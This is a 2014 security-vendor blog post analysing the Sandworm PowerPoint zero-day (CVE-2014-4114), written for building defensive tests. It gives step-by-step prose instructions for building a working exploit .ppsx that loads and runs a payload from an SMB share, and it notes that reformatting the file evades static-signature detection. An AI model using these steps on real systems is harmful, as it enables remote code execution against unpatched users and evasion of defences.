Some Information on the SandWorm 0-Day Vulnerability

October 21, 2014 by Ixia Blog Team

Author: Garett Montgomery

When preparing to write a Strike for a vulnerability, I like to look around on the Internet and see if there are any examples of the exploit. Usually I'm looking to make sure I've covered all the exploit vectors, but I also like to learn as much as I can about a vulnerability. With last week’s release of Microsoft Tuesday Patches for October, CVE-2014-4114 (MS14-060) got a lot of press. That's because quite a few sites picked up on the use of a 0-day being used by the Sandworm malware (a variant of BlackEnergy). Typically you won't find much more than generic terms describing the vulnerability at a high level–enough to convince users of the seriousness of the vulnerability, without providing enough details to easily create an exploit for the vulnerability. But in this case, there was quite a lot of information available. One company claimed to have found the vulnerability (and responsibly reported it to Microsoft), and shortly thereafter another company claimed to have found it and reported it even earlier. Mainstream articles proliferated touting the use of a 0-day, mentioning that US institutions had been among those targeted. Exploits modules and PoCs (Proof-of-Concept) were released, a screenshot of the patched function appeared on Twitter, and several low-level analyses of the exploit and vulnerability were published.

So for once, there's quite a bit of useful technical information about a vulnerability – as well as examples of exploits. I thought I would summarize some of the more interesting details I found, as well as provide commentary based on my own testing experience. At the end, I list out the steps you can use to get started to perform your own testing.

Blog Open Exploit

To create your own test setup:

1.Create an SMB share, accessible from your test system

2.Create an executable file (you can just create a text document with 'calc.exe', and save it with ‘.cmd’ extension)

3.Take the .inf file, and replace slide1.gif with you the name of your executable file

4.Save the modified .inf file and your executable file to the SMB share

5.Copy the ppsx file, unzip it, and go to the ‘ppt/embeddings/’ directory

6.Open each .bin file with a hex editor and replace the SMB path with the appropriate SMB path of your replacement file.

7.Zip the changed files up and change the extension to .ppsx

8.Open the .ppsx file with Microsoft PowerPoint on an unpatched, supported Windows operating system (more recent than XP).

9.Calculator pops up when the slideshow is initiated

10.Try saving the .ppsx file in other formats to see the resulting output, as well as to test your Network Protection Device.

Some highlights from my testing that I didn't find mentioned anywhere else:

  • The file rename action is not required. I expected that there were only certain file formats or extensions that could be downloaded and executed. But if you set up your own testing environment, you'll find that you do not need to change the file extension, you can just directly execute your target executable file.
  • The inf file can be used to execute commands directly – downloading an exe is not required. You can execute whatever command you choose (try replacing %1%\slide1.gif.exe with calc.exe)
  • The zip format for most of the office files means that any change to any of the files in the archive will alter the zip file – static strings won't be of much use in detecting an exploit for this vulnerability. All files that embed OLE objects will need to be decompressed, and searched for embedded objects. Devices that just inspect bytes on the wire will have a hard time with this.
  • Using PowerPoint 2007 the .ppsx file could be saved in 27 different formats.
  • When saved as PowerPoint XML Presentation (.xml), the file was a single XML document, and the contents of were base64 encoded within the XML. This will likely require different detection methods.

Leverage Subscription Service to Stay Ahead of Attacks

Additional Resources: